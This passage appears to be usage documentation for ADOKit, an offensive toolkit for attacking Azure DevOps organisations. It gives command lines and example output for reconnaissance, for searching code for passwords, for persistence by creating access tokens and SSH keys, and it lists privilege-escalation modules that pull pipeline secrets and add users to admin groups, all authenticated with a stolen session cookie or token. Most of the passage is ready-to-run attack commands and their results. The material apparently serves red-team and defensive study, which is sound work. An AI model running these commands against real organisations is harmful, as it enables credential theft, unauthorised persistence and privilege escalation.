        • /project: - Project to perform an action for. Not applicable to all modules.
        • /user: - Perform an action against a specific user. Not applicable to all modules.
        • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
        • /group: - Perform an action against a specific group. Not applicable to all modules.

        Authentication Options

        Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

        • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
        • /credential:UserAuthentication=ABC123
        • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
        • /credential:apiToken

        Module Details Table

        The below table shows the permissions required for each module.

        Attack Scenario Module Special Permissions? Notes
        Recon check No
        Recon whoami No
        Recon listrepo No
        Recon searchrepo No
        Recon listproject No
        Recon searchproject No
        Recon searchcode No
        Recon searchfile No
        Recon listuser No
        Recon searchuser No
        Recon listgroup No
        Recon searchgroup No
        Recon getgroupmembers No
        Recon getpermissions No
        Persistence createpat No
        Persistence listpat No
        Persistence removepat No
        Persistence createsshkey No
        Persistence listsshkey No
        Persistence removesshkey No
        Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
        Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
        Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
        Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
        Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

        Examples

        Validate Azure DevOps Access

        Use Case

        Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

        Syntax

        Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

        ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: check
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/28/2023 3:33:01 PM
        ==================================================


        [*] INFO: Checking if organization provided uses Azure DevOps

        [+] SUCCESS: Organization provided exists in Azure DevOps


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        3/28/23 19:33:02 Finished execution of check

        Whoami

        Use Case

        Get the current user and the user's group memberhips

        Syntax

        Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

        ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: whoami
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 11:33:12 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com


        [*] INFO: Listing group memberships for the current user


        Group UPN | Display Name | Description
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
        [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

        4/4/23 15:33:19 Finished execution of whoami

        List Repos

        Use Case

        Discover repositories being used in Azure DevOps instance

        Syntax

        Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

        ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listrepo
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 8:41:50 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | URL
        -----------------------------------------------------------------------------------
        TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
        MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
        SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
        AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
        ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
        TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

        3/29/23 12:41:53 Finished execution of listrepo

        Search Repos

        Use Case

        Search for repositories by repository name in Azure DevOps instance

        Syntax

        Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

        ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

        ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

        Example Output

        C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

        ==================================================
        Module: searchrepo
        Auth Type: API Key
        Search Term: test
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 9:26:57 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | URL
        -----------------------------------------------------------------------------------
        TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
        TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

        3/29/23 13:26:59 Finished execution of searchrepo

        List Projects

        Use Case

        Discover projects being used in Azure DevOps instance

        Syntax

        Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

        ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listproject
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 7:44:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | Visibility | URL
        -----------------------------------------------------------------------------------------------------
        TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
        MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
        ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
        TestProject | private | https://dev.azure.com/YourOrganization/TestProject

        4/4/23 11:45:04 Finished execution of listproject

        Search Projects

        Use Case

        Search for projects by project name in Azure DevOps instance

        Syntax

        Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

        ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

        ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

        Example Output

        C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

        ==================================================
        Module: searchproject
        Auth Type: API Key
        Search Term: map
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 7:45:30 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | Visibility | URL
        -----------------------------------------------------------------------------------------------------
        MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

        4/4/23 11:45:31 Finished execution of searchproject

        Search Code

        Use Case

        Search for code containing a given keyword in Azure DevOps instance

        Syntax

        Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

        ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

        ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

        Example Output

        C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

        ==================================================
        Module: searchcode
        Auth Type: Cookie
        Search Term: password
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 3:22:21 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
        |_ Console.WriteLine("PassWord");
        |_ this is some text that has a password in it

        [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
        |_ Console.WriteLine("PaSsWoRd");

        [*] Match count : 3

        3/29/23 19:22:22 Finished execution of searchco de

        Search Files

        Use Case

        Search for files in repositories containing a given keyword in the file name in Azure DevOps

        Syntax

        Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

        ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

        ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

        Example Output

        C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

        ==================================================
        Module: searchfile
        Auth Type: Cookie
        Search Term: test
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 11:28:34 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        File URL
        ----------------------------------------------------------------------------------------------------
        https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
        https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
        https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

        3/29/23 15:28:37 Finished execution of searchfile

        Create PAT

        Use Case

        Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

        Syntax

        Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

        ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: createpat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/31/2023 2:33:09 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        PAT ID | Name | Scope | Valid Until | Token Value
        ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

        3/31/23 18:33:10 Finished execution of createpat

        List PATs

        Use Case

        List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.

        Syntax

        Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

        ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listpat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/31/2023 2:33:17 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        PAT ID | Name | Scope | Valid Until
        -------------------------------------------------------------------------------------------------------------------------------------------
        9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
        8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

        3/31/23 18:33:18 Finished execution of listpat

        Remove PAT

        Use Case

        Remove a PAT for a given user in an Azure DevOps instance.

        Syntax

        Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

        ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

        ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

        Example Output

        C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

        ==================================================
        Module: removepat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 11:04:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

        PAT ID | Name | Scope | Valid Until
        -------------------------------------------------------------------------------------------------------------------------------------------
        9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

        4/3/23 15:05:00 Finished execution of removepat

        Create SSH Key

        Use Case

        Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

        Syntax

        Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

        ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

        Example Output

        C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

        ==================================================
        Module: createsshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 2:51:22 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
        fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

        4/3/23 18:51:24 Finished execution of createsshkey

        List SSH Keys

        Use Case

        List all public SSH keys for a given user in an Azure DevOps instance.

        Syntax

        Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

        ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listsshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 11:37:10 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
        ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

        4/3/23 15:37:11 Finished execution of listsshkey

        Remove SSH Key

        Use Case

        Remove an SSH key for a given user in an Azure DevOps instance.

        Syntax

        Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

        ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

        ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

        Example Output

        C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

        ==================================================
        Module: removesshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 1:50:08 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        ---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
        ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

        4/3/23 17:50:09 Finished execution of removesshkey

        List Users

        Use Case

        List users within an Azure DevOps instance

        Syntax

        Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

        ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listuser
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:12:07 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        user1 | User 1 | user1@YourOrganization.onmicrosoft.com
        jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
        rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
        user2 | User 2 | user2@YourOrganization.onmicrosoft.com

        4/3/23 20:12:08 Finished execution of listuser

        Search User

        Use Case

        Search for given user(s) in Azure DevOps instance

        Syntax

        Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

        ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

        ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

        Example Output

        C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

        ==================================================
        Module: searchuser
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:12:23 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        user1 | User 1 | user1@YourOrganization.onmic rosoft.com
        user2 | User 2 | user2@YourOrganization.onmicrosoft.com

        4/3/23 20:12:24 Finished execution of searchuser

        List Groups

        Use Case

        List groups within an Azure DevOps instance

        Syntax

        Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

        ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listgroup
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:48:45 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
        [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
        [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
        [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
        [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
        [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
        [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
        [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


        ---SNIP---

        4/3/23 20:48:46 Finished execution of listgroup

        Search Groups

        Use Case

        Search for given group(s) in Azure DevOps instance

        Syntax

        Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

        ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

        ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

        Example Output

        C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

        ==================================================
        Module: searchgroup
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:48:41 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
        [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
        [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
        [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
        [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
        [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

        4/3/23 20:48:42 Finished execution of searchgroup

        Get Group Members

        Use Case

        List all group members for a given group

        Syntax

        Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

        ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

        ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

        Example Output

        C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

        ==================================================
        Module: getgroupmembers
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 9:11:03 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
        [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
        [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
        [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
        [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
        [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
        [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

        4/4/23 13:11:09 Finished execution of getgroupmembers

        Get Project Permissions

        Use Case

        Get a listing of who has permissions to a given project.

        Syntax

        Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

        ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

        ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

        Example Output

        C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

        ==================================================
        Module: getpermissions
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 9:11:16 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
        [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
        [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
        [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


        [*] INFO: List ing group members for each group that has permissions to this project



        GROUP NAME: [MaraudersMap]\Build Administrators

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


        GROUP NAME: [MaraudersMap]\Contributors

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
        [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


        GROUP NAME: [MaraudersMap]\MaraudersMap Team

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


        GROUP NAME: [MaraudersMap]\Project Administrators

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


        GROUP NAME: [MaraudersMap]\Project Valid Users

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


        GROUP NAME: [MaraudersMap]\Readers

        Group | Mail Address | Display Name
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
